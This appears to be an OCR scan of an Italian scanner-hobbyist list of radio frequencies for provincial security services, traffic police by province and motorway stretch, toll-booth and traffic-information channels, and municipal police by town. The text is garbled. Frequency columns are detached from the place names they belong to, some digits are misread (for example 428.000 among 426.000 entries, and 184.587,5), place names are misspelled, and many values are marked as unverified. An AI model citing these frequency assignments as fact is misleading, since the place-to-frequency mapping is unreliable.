426.675 


425.150 


426.325 


425.150 


425.500 


426.575 


425.525 


426.225 


425.500 


425.500 


426.300 


425.600 


426.750 


425.600 


426.800 


425.600 


425.625 426.000 


426.650 426.000 


425.850 426.000 


426.425 426.000 


425.625 426.000 


425.625 426.000 


426.950 426.000 


425.675 426.000 


426.850 426.000 


425.675 426.000 


426.900 426.000 


425.675 426.000 


425.450 425.750 425.075 425.125 425.225 426.000 
426.175 426.575 426.650 


Abbiategrasso 
Corsico 

San Donato Milanese 
Monza 

Cassano d’ Adda 
Desio 

Legnano 

Rho 

Sesto San Giovanni 
Seregno 


Modena 

Carpi 

Pavullo nel Frignano 
Sassuolo 


Napoli 

Ischia 

Pozzuoli 

Pomigliano d'Arco 
Casoria 

Castellammare di Stabia 
Giugliano in Campania 
Noia 

Sorrento 

Torre Annunziata 
Torre del Greco 


Novara 
Arona 
Domodossola 


Nuoro 
Bitti 

Isili 
lerzu 
Lanusei 
Macomer 
Ottone 
Siniscola 
Sorgono 


Oristano 
Ghilarza 
Mogoro 


Padova 
Abano Terme 
Cittadella 

Este 

Piove di Sacco 


Palermo 
Begheria 
Carini 

Cefalù 
Corleone 
Lercara Friddi 
Misilmeri 
Monreale 
Partinico 
Petralia Sottana 


425.300 


425.000 


424.575 


426.250 
426.775 
425.300 
425.800 


426.350 


426.400 


425.550 


425.800 


425.450 
426.175 
425.300 


425.975 


425.050 


424.675 


426.550 
426.875 
425.975 
425.875 


426.625 


426.450 


425.925 


425.875 


425.750 
426.575 
425.975 


426.475 426.525 


425.150 425.600 


424.725 424.850 


425.350 425.425 
426.925 

426.475 426.525 
426.275 426.375 


426.675 426.850 


426.725 426.825 


426.100 426.225 


426.275 426.375 


425.075 425.125 
426.650 
426.475 426.525 


426.700 


425.675 


425.300 


425.625 


426.700 
426.600 


426.000 


426.975 


426.425 


426.600 


425.225 


426.700 


426.000 


426.000 


426.000 


426.000 


426.000 
426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


Termini Imerese 


Parma 

Borgo Val di Taro 
Fidenza 
Salsomaggiore 


Pavia 
Stradella 
Vigevano 
Voghera 


Perugia 

Assisi 

Città delle Pieve 
Città di Castello 
Foligno 

Gubbio 

Norcia 

Spoleto 

Todi 


Pesaro 
Fano 
Novafeltria 


Pescara 
Penne 
Popoli 


Piacenza 
Bobbio Piacentino 
Fiorenzuola dAida 


Pisa 
Pontedera 
San Miniato 
Volterra 


Pistoia 
Montecatini Terme 
San Marcello Pistoiese 


Pordenone 
Sacile 


Potenza 
Acerenza 
Lagonegro 
Melfi 
Senise 
Venosa 
Viggiano 


Prato 
Ragusa 


Modica 
Vittoria 


424.500 424.650 424.700 424.775 424.875 426.000 


425.800 425.875 426.275 426.375 428.600 426.000 


425.950 426.200 426.325 426.800 426.900 426.000 


425.450 425.750 


425.800 425.875 


424.550 424.625 


425.375 425.650 


425.175 425.250 


425.900 426.050 


425.450 425.750 


425.950 426.200 


425.375 425.650 


425.075 


426.275 


424.825 


425.700 


425.475 


426.125 


425.075 


426.325 


425.700 


425.125 


426.375 


424.925 


425.775 


425.525 


426.300 


425.125 


426.800 


425.775 


425.225 


426.600 


424.975 


426.150 


425.650 


426.950 


425.225 


426.900 


426.150 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


426.000 


Ravenna 
Cervia 
Faenza 
Lugo 


Reggio Calabria 
Bianco 

Gioia Tauro 

Locri 

Melito di Porto Salvo 
Palmi 

Roccella Ionica 
Taurianova 

Villa San Giovanni 


Reggio Emilia 
Castelnuovo nè Monti 
Guastalla 


Rieti 
Cittaducale 
Poggio Mirteto 


Rimini 
Riccione 


Roma 

Roma (aeroporto Ciampino) 
Roma (aeroporto Fiumicino) 
Roma Cassia 

Bracciano 

Civitavecchia 
Monterotondo 

Subiaco 

Tivoli 

Frascati 

Anzio 

Castel Gandolfo 

Colleferro 

Ostia 

Palestrina 

Pomezia 

Velletri 


Rovigo 
Adria 
Castelmassa 


Salerno 

Agropoli 

Amalfi 

Battipaglia 

Eboli 

Nocera Inferiore 
Sala Consilina 
Sapri 

Vallo della Lucania 


Sassari 
Alghero 
Bono 
Bonarva 


425.175 425.250 425.475 425.525 425.850 426.000 


425.275 425.325 425.400 425.575 425.725 426.000 


424.525 424.600 424.800 


425.175 425.250 425.475 


425.025 425.100 425.200 


425.450 425.750 425.075 


426.175 426.575 426.650 


425.300 425.975 426.475 
425.275 425.325 425.400 


425.375 425.650 425.700 


426.250 426.550 426.775 


425.900 426.050 426.125 


424.900 


425.525 


425.500 


425.125 


426.525 
425.575 


425.775 


426.675 


426.300 


424.950 


425.850 


425.625 


425.225 


426.700 
425.725 


426.150 


426.925 


426.950 


426 000 


426.000 


426.000 


426.000 


426.000 
426.000 


426.000 


426.000 


426.000 


426.250 426.550 426.775 426.875 426.925 426.000 


Valledoria 

Olbia 

Ozieri 

Porto Torres 
Tempio Pausania 


Savona 

Alassio 

Albenga 

Cairo Montenotte 


Siena 


Abbadia San Salvatore 


Montalcino 
Montepulciano 
Poggibonsi 


Siracusa 
Augusta 
Avola 
Lentini 
Noto 


Sondrio 
Chiavenna 
Tirano 


Taranto 
Castellaneta 
Manduria 
Martina Franca 


Teramo 
Giulianova 
Nereto 


Terni 
Amelia 
Orvieto 


Torino 

Chieri 
Chivasso 
Ivrea 
Moncalieri 
Pinerolo 
Rivoli 

Susa 

Venaria Reale 


Trapani 

Alcamo 
Castelvetrano 
Marsala 

Mazara del Vallo 


Trento 

Borgo Valsugana 
Cavalese 

Cles 

Riva del Garda 
Rovereto Trentino 


425.450 


425.900 


425.800 


426.250 


426.250 


425.550 


426.400 


426.250 
426.775 
425.300 


425.950 


426.350 


425.750 


426.050 


425.875 


426.550 


426.550 


425.925 


426.450 


426.550 
426.875 
425.975 


426.200 


426.625 


426.175 


426.125 


426.275 


426.775 


426.775 


425.100 


426.725 


425.350 
426.925 
426.475 


426.325 


426.675 


426.575 


426.300 


426.375 


426.675 


426.875 


426.225 


426.825 


425.425 


426.525 


426.800 


426.750 


426.650 


426.950 


426.600 


426.925 


426.925 


426.425 


426.975 


425.825 


426.700 


426.900 


426.850 


426.000 


426.000 


426.000 


426.000 


426.000 


426 000 


426.000 


426.000 


426.000 


426.000 


426.000 


Treviso 425.025 425.100 425.200 425.500 425.625 426.000 
Castelfranco Veneto 

Conegliano Veneto 

Vittorio Veneto 


Trieste 426.350 426.625 426.675 426.750 426.850 426.000 
Aurisina 
Muggia 


Udine 425.950 426.200 426.325 426 800 426.900 426.000 
Cividale del Friuli 

Palmanova 

Tarvisio 

Tolmezzo 


Varese 425.550 425.925 426.100 428.225 426.425 426.000 
Busto Arsizio 

Gallarate 

Luino 

Saronno 


Venezia 425.450 425.150 426.175 428.575 426.650 426 000 
Chioggia 

Mestre 

Portogruaro 


Verbania 426.750 426.000 


Vercelli 425.275 425.325 425.575 425.725 426.000 
Varallo Sesia 


Verona 425.900 426.050 426.125 426.300 426.950 426.000 
Caprino Veronese 

Legnago 

San Bonifacio 

Villafranca di Verona 


Vibo Valentia 425.550 425.925 426.100 426.225 426.425 426.000 


Vicenza 425.000 425.050 425.150 425.600 425.675 426.000 
Bassano del Grappa 

Schio 

Thiene 

Valdagno 


Viterbo 426.350 426.625 428.675 426.750 426.850 428.000 
Civita Castellana 

Montef iascone 

Ronciglione 

Tuscania 


Sono inoltre frequenze nazionali comuni a tutte le provincie: 426.025 426.075 426.475 
FREQUENZE PER IMIPIEGO AERONAUTICO : Civile Vhf 121.350 - Militare Uhf 292.900 


ALTRI SERVIZI SONO OPERATI VI ENTRO I LIMITI DI BANDA : 
154.600 - 155.975 170.000 - 171.975 173.000- 174.000 MHz 


VIGILANZA 


BANDA 169 MHz 


LINK MASTER UHF - COMPRESI NELLA BANDA CIVILE UHF 
440.925 441.200 (3a frequenza non disponibile) 


ASSEGNAZIONE FREQUENZE 
Nazionale 169.925 
Nazionale 169.937,5 


Nazionale 169.950 


ARTERIE STRADALI 
PRONTO INTERVENTO - POLIZIA STRADALE 


BANDA 76 -79 MHz 


LINK MASTER UHF - LIMITI DI BANDA 434-435 443 - 444 MHz 


PER OGNI PROVINCIA VENGONO RIPORTATI I DISTACCAMENTI DIPENDENTI 


PROVINCIE E LOCALITA’ FREQUENZE 
Agrigento 78.325 
Canicattì 

Sciacca 

Alessandria 77.275 77.500 


Acqui Terme 
Casale Monferrato 
Ovada 

Serravalle Scrivia 
Tortona 

Valenza 


Ancona 76.875 78.025 
Fabriano 

Jesi 

Senigallia 


Aosta 78.575 
Courmayeur 

Entreves 

Poni Saint Martin 


Arezzo 77.400 77.425 78.700 78.775 
Poppi 
San Giovanni Valdarno 


Ascoli Piceno 76.875 77.625 
Amandola 

Fermo 

Porto San Giorgio 

San Benedetto del Tronto 


Asti 77.275 78.000 
Nizza Monferrato 


Avellino 77.500 (da verificare) 
Grottaminarda 
Mercogliano 


Bari 78.075 
Barletta 

Castellana Grotte 

Gioia del Colle 

Ruvo di Puglia 

Spinazzola 

Trani 


Belluno 77.600 78.000 
Cortina d'Ampezzo (località Maion) 


Feltre 
Benevento 77.500 (da verificare) 


Bergamo 78.075 79.025 
Seriate (casello autostradale) 
Treviglio 


Biella 77.275 79.150 


Bologna 77.800 

Bologna (casello autostradale — Bologna centro) 

Borgo Panigale 

Casalecchio di Reno 

Imola 

Malalbergo (caselle autostradale — Altedo) 

Piano del Voglio 

San Benedetto Val di Sambro (casella autostradale — Pian del Voglio) 


Bolzano 77.600 78.000 
Bressanone 

Brunico 

Merano 

San Candido 

Vipiteno 


Brescia 77.150 79.025 
Darfo — Boario Terme 

Chiari 

Desenzano 

Iseo 

Montichiari 

Salò 


Brindisi 78.075 
Fasano 


Cagliari 77.775 78.600 
Muravera 
Sanluri 


Caltanissetta 77.725 78.325 
Gela 


Campobasso 77.425 77.150 
Termoli 


Caserta 77.500 (da verificare) 
Caserta (caselle autostradale — Caserta nord) 

Capua 

Mondragone 


Catania 77.350 77.875 78.525 
Caltagirone 
Randazzo 


Catanzaro 77.400 
Catanzaro (località Viadotto Fiumarella-Gagliano) 
Lamezia Terme (località SantEufemia Lamezia) 
Soverato 


Chieti 77.425 77.150 


Lanciano 

Ortona 

San Salvo (casella autostradale — Vasto sud) 
Vasto 


Como 78550 79.025 


Cosenza 77.400 
Frascineto (svincolo autostradale) 

Paola 

Rende (frazione Quattromiglia) 

Rossano (contrada Frasso) 

Scalea 

Trebisacce 


Cremona 77.300 77.600 79.025 
Crema 

Casalmaggiore 

Pizzighettone 


Crotone 77.400 


Cuneo 76.775 77.275 
Ceva 

Cherasco 

Saluzzo 


Enna 77.875 78.525 
Catenanuova (svincolo autostrada) 
Nicosia 


Ferrara 77.800 78.200 
Argenta 
Codigoro 


Firenze 77.400 77.425 78.700 78.775 
Empoli 
Sesto Fiorentino (casello autostradale — Firenze nord) 


Foggia 78.075 
Foggia (casello autostradale — Foggia) 

Cerignola 

San Severo 

Vieste 


Forlì 77.800. 
Forlì (casello autostradale Forlì) 

Bagno di Romagna (località San Pietro in Bagno) 
Cesena 

Rocca San Casciano 


Frosinone 78.125 
Frosinone (casello autostradale — Frosinone) 

Cassino 

Sora 

Genova 78.625 78.925 
Chiavari — Lavagna 

Sampierdarena 

Gorizia 77.300 


Monfalcone 


Grosseto 77.400 77.425 78.700 76.775 
Arcidosso 

Massa Marittima 

Orbetello 


Imperia 78.825 78.850 78.925 
Imperia (casello autostradale — imperia ovest) 

San Remo 

Ventimiglia 


Isernia 77.125 
Agnone 


La Spezia 78.625 78.925 
Brugnato 


Latina 78.125 78.300 
Aprilia 

Formia 

Terracina 


Lecce 78.075 
Maglie 


Lecco 78.550 79.025 
Colico 


Livorno 77.400 77.425 78.700 78.775 79.025 (isola d’Elba) 
Campiglia Marittima (località Venturina) 

Cecina 

Portoferraio 

Rosignano Marittimo (casello autostradale Vada) 


Lodi 79.025 79 100 
Guardamiglio (casello autostradale — Piacenza nord) 


Lucca 77.400 77.425 77.525 78.700 78.775 
Bagni di Lucca (località Debbio-Fornoli) 
Viareggio 


L’Aquila 77.125 
Avezzano 

Carsoti 

Castel di Sangro 

Pratola Patigna 

Sulmona 


Macerata 76.875 
Camerino 

Civitanova Marche 

Porto Recanati 


Mantova 77.200 79.025 
Ostiglia 
Massa 77.400 77.425 78.700 78.775 


Aulla (locatità Barcara) 


Matera 77.175 (da verificare) 
Poticoro 
Scanzano Jonico 


Messina 77.875 
Barcellona Pozzo di Gotta 


78.525 


Giardini Naxos (svincolo autostradale — Taormina sud) 


SantAgata di Militello 


Milano 79.025 
Arcore 

Assago (tangenziale Milano ovest) 

Magenta 

San Donato Milanese 

Seregno 


Modena 77.800 
Mirandota 
Pavullo nel Fngnano 


79.100 


Napoli 77.500 77.575 


Nota 
Pozzuoli 
Sorrento 


Novara 77.275 
Arona 

Borgomanera 

Domodossola 

Romagnano Sesia (casello autostradale) 


Nuoro 78.600 
Bitti 

Fonni 

Laconi 

Lanusei 

Macomer 

Orosei 

Ottona 

Siniscola 


Oristano 78.600 


Padova 77.700 
Piove di Sacco 


Palermo 77.725 
Campofelice di Roccella (svincolo Bonfornello) 
Cefalù (contrada Sante Lucia) 

Corleone 

Lercara Fnddi 

Termini Imerese 


Parma 77.800 
Bercato 

Fidenza 

Fornovo di Taro 


Pavia 78.175 
Stradella 

Vigevano 

Voghera 

Perugia 77.250 


Castiglione del Lago 


78.950 


78.525 78.575 


78.325 


79.025 


78.300 


Città di Castello 
Foligno 
Todi 


Pesaro 76.875 
Cagli 

Fano 

Novafeltria 

Urbino 


Pescara 77.425 
Bolognano 

Città SantAngelo (località Marina di Città Sant'Angelo) 
Penne 


Piacenza 77.800 


Pisa 77.400 77.425 78.700 78.775 
Volterrra 


Pistoia 77.400 77.425 78.700 78.775 
Piave a Nievole (casello autostradale — Montecatini Terme) 
San Marcello Pistoiese 


Pordenone 77.300 
Spilimbergo 


Potenza 77.175 (da verificare) 
Lagonegro 

Melfi (località Valleverde) 

Moliterno 


Prato 77.400 77.425 78.700 78.775 


Ragusa 77.875 78.525 
Vittoria 


Ravenna 77.800 
Faenza 
Lugo 


Reggio Calabria 77.400 77.900 
Brancaleone 

Palmi (contrada San Gaetano) 

Siderno 

Villa San Giovanni 


Reggio Emilia 77.800 
Casteinovo nè Monti 

Guastalla 

Rieti 77.800 78.125 
Amatrice 


Fara in Sabina (località Passo Corese) 


Rimini 77.800 

Riccione 

Roma 77.950 78.025 78.075 78.125 79.175 
Albano Laziale 

Cerveteri 


Civitavecchia 


Colleferro 

Fiano Romano (caselle autostradale Roma nord) 
Settabagni 

Tivoli 

Velletri 


Rovigo 77.700 
Adria 

Badia Polesine 

Roverdicrè (caselle autostradale) 


Salerno 77.500 
Angri 

Eboli 

Sala Consilina 

Sapri 

Vallo della Lucania 

Vecite Santa Caterina 


Sassari 77.775 
Olbia 

Ozieri 

Tempio Pausania 


Savona 78.825 
Albenga 

Carcare 

Finale Ligure 


Siena 77.400 
Montepulciano 


Siracusa 77.875 
Lentini 
Noto 


Sondrio 77.450 
Chiavenna 
Tirano 


Taranto 78.075 
Manduria 
Palagiano (caselle aulostradale — Grottaglie) 


Teramo 77.125 
Giulianova 

Pineto 

Terni 77.250 
Orvieto 


Orvieto scalo 


Torino 77.275 
Chivasso 

Pinerolo 

Susa 


Trapani 78.325 
Alcamo 

Castelvetrano 

Marsala 


78.525 78.575 


(da verificare) 


78.600 


78.925 


77.425 78.700 78.775 


78.525 78.575 


(da verificare) 78.275 79.025 


78.300 


77.925 78.525 


Trento 
Cavalese 

Male 

Riva del Garda 


Treviso 
Castelfranco Veneto 
Villorba 

Vittorio Veneto 


Trieste 


Udine 

Amaro 

Cervignano del Friuli 
Pontebba 

Tolmezzo 


Varese 
Busto Arsizio 
Luino 


Venezia 

Venezia — Mestre 
Portogruaro 

San Donà di Piave 


Verbania 
Verbania (località Pallanza) 


Vercelli 
Varallo Sesia 
Villarboit (autostrada Serenissima) 


Verona 
Bardolino 
Legnago 


Vibo Valentia 


Vicenza 
Bassano del Grappa 
Schio 


Viterbo 

Olvita Castellana 
Monterosi 
Tarquinia 


77.600 


77.700 78.525 78.575 


77.300 


77.300 


78.900 


77.700 


79.025 


78.525 


77.725 (Mestre) 


77.275 


77.275 


77.700 


77.400 


77.700 


78.125 


78.950 


79.150 


78.525 


78.525 


79.125 


78.575 
77.750 (San Donà di Piave) 


78.575 


78.575 


AUTOSTRADE 


PRONTO INTERVENTO - POLIZIA STRADALE 


AUTOSTRADE 


A1 


A3 


A4 


A13 
A14 


A 15 
A 16 


A 18 
A 19 
A 20 


BANDA 76 -79 MHz 


FREQUENZE 


78.350 

78.425 

78.375 

78.425 

78.400 

78.425 

78.425 

78.400 

78.350 

78.400 (da verificare) 
78.750 

78.350 (da verificare) 
78.850 

79.150 

78.350 

78.400 

78.350 

78.400 - 77.700 
78.425 

78.425 

76.900 

78.450 

78.925 - 78.825 
78.350 

78.400 

78.350 

78.350 

78.375 

78.350 

78.350 

78.375 

78.400 

78.375 

non disponibile 
78.400 

78.400 

78.375 
78.350<>78.400 (sim.) 
78.425 
78.350<>78.425 (sim.) 
78.375 

78.450 

78.400 

78.450 

78.450 

78.400 

78.425 (da verificaire) 
78.450 

78.525 

78.325 - 78.525 
78.325 - 78.525 


TRATTE 


Milano - Lodi 

Lodi - Parma 

Reggio Emilia - Sasso Marconi (BO) 
Sasso Marconi (BO) - Firenze 
Firenze - Chiusi (SI) 

Chiusi (SI) - Roma 

Roma - Frosinone 

Frosinone - San Vittore (FR) 

San Vittore (FR) - Napoli 

Napoli -? 

Salerno - Lauria (PZ) 

Lauria (PZ) - Vibo Valentia 

Vibo Valentia - Reggio Calabria 
Torino - Milano (bari- Ghisolfa) 
Milano (barriera Ghisolfa - Milano est) 
Agrate Brianza (MI) - Brescia 
Brescia - Padova est 

Padova est - Mestre (VE) 

Mestre (VE) - Portogruaro (VE) 
Latisana (UD) - Trieste 

Torino nord - Aosta 

Carmagnola (TO) - Carcare (SV) 
Altare Carcere (SV) - Savona 
Milano - Serravalle Scrivia (AL) 
Serravalle Scrivia (AL) - Genova 
Milano nord - Varese I Sesto Calende (VA) 
Milano nord - Chiasso (CO) valico Brogeda 
Genova - Savona 

Savona - Ventimiglia (IM) valico doganale 
Firenze - Lucca 

Lucca - Pisa nord 

Genova - Sestri Levante (GE) 

Sestri Levante (GE) - Livorno 
Livorno - Roma 

Roma (barriera Aurelia) - Roma 
Bologna - Padova sud 

Bologna - Imola (BO) 

Cattolica (RN) - Ancona 

Ancona - San Benedetto del Tronto 
San Benedetto del Tronto - Pescara 
Pescara - Termoli Molise (CB) 
Termoli Molise - San Severo (FG) 
San Severo (FG) - Cerignola (FG) 
Cerignola (FG)- Taranto 

Parma - Le Spezia 

Napoli est - Benevento 

Benevento - Candela <FG) 

Candela (FG) - Canosa di Puglia (BA) 
Messina - Catania 

Palermo - Catania 

Messina - Palermo 


A21 


A 22 


A 23 


A 24 


A 27 

A 26 

A 29 

A 30 

A31 

A 32 

Milano tangenziali 
Torino tangenziale 
Genova nodo autostr. 
Bologna nodo autostr. 
Firenze nodo autostr. 
Napoti tangenzieli 
Roma gr. racc. anulare 


78.450 

77.300 

77.800 - 172.625 

78.525 - 172.625 

77.700 

77.800 

78.425 

78.400 

78.350 (ric. reg. Lazio) 
78.425 (ric. reg. Abruzzo) 
78.375<>78.400 (simulcast) 
(ric. regione Molise) 
78.350 (ric. reg. Lazio) 
78.425 (ric. reg. Abruzzo) 
78.375<>78.400 (simulcast) 
(ric. regione Molise) 
78.425 

78.375 

78.375 - 79.150 

78.450 

78.425 

78.325 

78.400 

78.350 

77.450 - 77.275 

78.350 

78.825 

78.375 - 78.400 - 78 425 
78.375 - 77.800 

78.400 - 78.425 - 77.400 - 78.775 
non disponibile . 

78.375 - 78.350 - 78.425 


Torino (barriera Trofarello) - Piacenza 
Piacenza - Brescia centro 
Soc. Autostrade Brennero (BZ) - Trento 
Soc. Autostrade Trento - Verona 
Verona - Mantova 
Mantova - Modena 
Patmanova (UD) - Udine 
Udine - Tarvisio (UD) 
Roma est - Teramo 
Roma est - Teramo 


Roma est - Teramo 
Roma est - Pescara 
Roma est - Pescara 


Roma est - Pescara 

Voltri (GE) - Alessandria 
Alessandria - Gravellona Toce (VB) 
Vercelli Ovest - tvrea (TO) 

Mestre (VE) - Vittorio Veneto (TV) 
Portogruaro (VE) - Pordenone 
Patermo - Mezara dat Vatio (TP) 
Caserta - Satemo (barriere Mercato) 
Vicenza - Piovene Rocchette (VI) 
Torino - Bardonecchia (TO) 
Tangenziati Est - Ovest 
Tengenziali 

Nodo autostradele 

Nodo autostradale 

Nodo autostradale 

Tengenziali Est - Ovest 

Grande Raccordo Anulare 

Barriere nord/sud/est/ovest 


AUTOSTRADE 
CASELLI PEDAGGIO - SOCCORSO STRADALE - INFORMAZIONI VIABILITA' 
BANDA VHEF (servizi compresi nella gamma civile e commerciale FM) 


LINK MASTER UHF LIMITI DI BANDA 436 - 440 446 - 448 MHz 
(compresi nella gamma civile UHF) 


CASELLI PEDAGGIO - SOCCORSO STRADALE 


ASSEGNAZIONE PERCORSI ASSEGNATI FREQUENZE 
Nazionale Ambito territoriale regionale 171.900 
Nazionale Ambito territoriale regionale 172.625 
Nazionale Ambito territoriale regionale 172.650 
Nazionale Ambito territoriale regionale 172.675 
Nazionale Ambito territoriale regionale 172825 
Nazionale Ambito territoriale regionale 172.850 
Nazionale Ambito territoriale regionale 172.875 


TRATTE CON UTILIZZO FREQUENZE NON COMPRESE NELL'ASSEGNAZIONE NAZIONALE 


A4 Torino - Milano (barriera Ghisolfa) 172.712,5 
A4 Torino-Milano (barriera Ghisolfa) 172.725 
A4 Verona - Venezia (Mestre Villabona) 172.725 
A4 Venezia (Mestre Bazzera) - Palmanova (UD) 172.975 
A4 Palmanova (UD) -Trieste 172.725 
A5 Torino nord - Aosta 172.662,5 
A7 Milano (barriera) - Gropello Cairoli (PV) 161.850 
AT Gropello Cairoli (PV) - Serravalle Scrivia (AL) 161.775 
A11 Pisa nord - Lucca 172.725 
A 12 Deiva Marina (SP) - Livorno 172.725 
A 15 Parma - La Spezia 163.525 
A21 Torino — Piacenza 172.662,5 
A21 Piacenza - Brescia 172.725 
A 23 Palmanova (UD) - Udine 172.725 
A31 Vicenza - Piovene Rocchette (VI) 172.725 
A 32 Torino - Susa (TO) 172.837,5 
A 32 Susa (TO) - Bardonecchia (TO) 161.700 
Milano tangenziali Tangenziali Est - Ovest 161.850 


INFORMAZIONI VIABILITA’ 


FREQUENZE COPERTURA D’ASCOLTO 
95.900 A 7 Milano - Serravalle Scrivia (AL) 
97.100 A 7 Milano - Serravalle Scrivia (AL) 
100.300 A 7 Milano — Serravalla Scrivia (AL) Radio Lombardia 
93.400 98.300 99.000 106.800 A 22 Brennero (BZ) - Verona nord 
101.300 101.500 Regione Friuli Venezia Giulia (tratte autostradali della regione) 
103.300 Isoradio (copertura quasi totale intera rete autostradale nazionale) 


100.300 Milano -Tangenziali Est/Ovest Radio Lombardia 


TRAFFICO VIABILITA’ - POLIZIA MUNICIPALE 


BANDE 156 - 175 440 - 470 MHz (servizi compresi nelle gamme civili VHF- UHF) 


LOCALITA’ PROV FREQUENZE 
Abano Terme PD 465.700 
Abbiategrasso MI 160.100 
Abetone PT 168.700 
Aci Castello CT 163.375 
Acireale CT 163.525 
Acqui Terme AL 168.587,5 
Adria RO 164.737.5 
Agrate MI 163.450 
Agrigento 162.100 
Agugliano AN 163.287,5 
Alassio SV 163.450 
Alba CN 160.087,5 160.687,5 
Albenga SV 160.475 
Albiate MI 160.625 
Albignasego PD 168.075 
Albisola Marina SV 160.375 
Albisola Superiore SV 165.375 
Alessandria 162.162,5 
Alpignano TO 162.225 
Altavilla Irpina AV 154.600 (da verificare) 
Alzano Lombardo BG 163.425 
Ameglia SP 160.050 
Ancona 163.375 
Andora SV 150.375 
Anguillara Veneta PD 160.125 
Aosta 163.450 
Apiro MC 163.600 
Apnca SO 156.475 
Arcevia AN 164.650 
Arcola SP 160.475 
Arconate MI 160.275 
Arcore MI 445.575 
Arenzano GE 164.925 
Arezzo 160.775 
Ariano Irpino AV 160.500 
Arluno MI 460.000 
Arona NO 163.300 
Ascoli Piceno 163.400 
Asiago VI 160.150 
Assago MI 160.325 
Assisi PG 162.000 
Asti 160.925 
Avellino 465.425 
Bagnacavallo RA 465.525 
Bagnoli Irpino AV 163.275 
Ballabio CO 160.100 
Bareggio MI 165.025 (da verificare) 
Bari 162.300 162.450 
Basiglio MI 165.300 
Bassano del Grappa VI 165.000 
Bazzano BO 156.700 
Beinasco TO 184.587,5 
Bellaria RN 160.200 


Belluno 160.500 o 161. 225 


Bellusco 
Benevento 
Bergamo 
Bergeggi 
Bertinoro 
Biella 
Binasco 
Bolano 
Bollate 
Bologna 
Boltiere 
Bolzano 
Bondeno 
Bordighera 


Borgaro Torinese 
Borghetto Santo Spirito 
Borgo San Dalmazzo 


Borgosesia 
Botticino 
Boves 
Bozzole 
Brandizzo 
Brà 
Brescia 
Bresso 
Bricherasio 
Brindisi 
Brugheno 
Brugnato 
Buccinasco 
Busalla 
Bussero 
Bussoleno 
Buttigliara Alte 


Cairo Montenotte 


Caivano 
Caltanissetta 
Camaiore 
Cambiago 
Cameri 
Camogli 
Campobasso 
Campogalliano 
Campomorone 
Candiolo 
Canegrate 
Canetti 
Cannobio 
Cantù 

Canzo 
Caponago 
Capri 

Capurso 
Cerate Brianza 
Caravaggio 


Cardano al Campo 


Carmagnola 


Carpaneto Piacentino 


Carpi 
Carrara 
Certoceto 


MI 


SV 


440.575 
161.600 
467.900 466.375 
164.900 
163.500 
162.037,5 
160.075 
164.925 
165.225 
160.625 
165.200 
180.775 
163.500 
160.475 
160.650 
160.250 
160.612,5 
156.925 
160.075 
445.500 
160.512,5 
444.650 
160.600 
164.600 
160.412,5 
163.275 
162.725 
160.550 
160.375 
165.300 
161.150 
156.725 
160.137.5 
160.050 
163.475 
163.850 
164.450 
163.550 
166.337,5 
166.450 
164.925 
160.250 
160.025 
163.600 
466.100 
164.725 
160.562,5 
165.750 
163.425 
160.767,5 
156.725 
156.975 
163.425 
165.125 
162.375 
160.100 
160.225 
160.175 
466.475 
163.600 
160.025 


Carugate 

Casale Monferrato 
Casalecchio di Reno 
Caselle Torinese 
Casorate Primo 
Cassina dè Pecchi 
Cassola 

Castei Giorgio 
Castel Goffredo 
Castel Maggiore 
Castelfidardo 
Cesteifranco Emilia 
Castelfranco Veneto 
Castellammare di Stabia 
Castelnuovo Magra 
Castelnuovo Rangone 
Castelraimondo 
Cestelsantangelo 
Castelvetro 
Castiglione della Pescaia 
Catania 

Catanzaro 

Cattolica 

Cavalese 
Cavallasca 
Cavarzere 
Cavenago Bnanza 
Cavenago d’ Adda 
Celle Ligure 

Cento 

Ceparana 

Cerano Intelvi 
Ceriale 

Cernusco sul Naviglio 
Cervia 

Cervo 

Cesano Boscone 
Cesano Maderno 
Cesate 

Cesena 

Cesenatico 

Cava 

Chiaravalle 
Chievari 

Chieri 

Chioggia 

Chivasso 

Ciriè 

Cinisello Balsamo 
Cistiano 

Città della Pieve 
Cittadella 

Codroipo 

Cogoleto 

Collegno 

Cologno Monzese 
Comacchio 
Comelico Superiore 
Como 

Conselice 
Conversano 
Copparo 


GR 


LO 


160.900 
163.575 
165300 
164.862,5 
155687,5 (da verificare) 
160.325 
165.050 
162.225 
164.967,5 
164.525 
163. 462,5 
162.350 
163.450 
162.300 
161 425 
164.800 
161 500 
459.625 
160.175 
163.600 


163.625<>173.987,5 (simulcast) 


162.4250 163.425 
160.000 
165.150 
160.062,5 
160.575 
160.100 
160.475 
161.150 
163.500 
164.925 
166.550 
160. 575 
161.475 
164.775 
163.267,5 
165.200 
160.150 
441.225 
465.900 
160.575 
162.075 
165.275 
162.450 
160.800 
164.775 
160.800 
164.850 
165.075 165.275 
160.550 
160.275 
164.300 
160.225 
160.250 
163.275 
160.037,5 
161.275 o 162.350 
160.587,5 
163.450 
466 975 
163.400 
165.300 


Corbetta 
Corciano 
Corinaldo 
Comaredo 
Correggio 
Corsico 
Cortina dAmpezzo 
Cosenza 
Cossato 
Courgne 
Crema 
Cremona 
Crescentino 
Crotone 
Cuggiono 
Cuneo 

Cusago 
Cusano Milanino 
Dalmine 
Desio 

Diano Marina 
Domodossola 
Enna 

Eraclea 

Erba 

Este 

Fabriano 
Faenza 
Falconara Marittima 
Fano 

Feltre 
Fermignano 
Ferrara 
Filottrano 
Finale Ligure 
Firenze 
Fivizzano 
Foggia 
Foligno 
Follonica 
Fontaniva 
Forti 
Formigine 
Forte dei Marmi 
Fosdinovo 
Gabicce 
Gaggiano 
Garbagnate Milanese 
Garda 

Gatteo 

Gatteo Mare 
Gattinara 
Gavi 

Genga 
Genova 
Giarre 
Giussano 
Gorizia 
Gressoney Saint Jean 
Grignasco 
Grosseto 
Grottaminarda 


156.300 
160.512.5 
150.025 
160.075 
160.050 
160.050 
165.875 
162.300 
162.037.5 
162.062,5 
162.175 
172.725 
158.675 
162.325 
156.625 
162.325 
165.125 
441.000 
165.200 
160.537,5 
164.900 
160.750 
171.900 
165.562,5 
160.767,5 
168.275 
163.400 
465.775 
163.587,5 
160.275 
160.500 
166.437,5 
160.550 
163.275 
162.050 
171.900 171.925 
160.600 
163.400 
161.500 
160.250 
441.475 
163.500 
160.050 
465.600 
164.775 
162.450 
160.550 
160.412,5 
163.450 164.375 (entrambe da verificare) 
164.850 
164.600 
160.462,5 
162.150 
161.600 
163.300 163.350 154.600 
163.375 
165.125 
160.525 
160.062,5 
165.350 
164.600 
155.750 


Grugliasco 
Guanzate 
Guastalla 
Gubbio 

Imola 

Imperia 

Inverigo 
Inveruno 

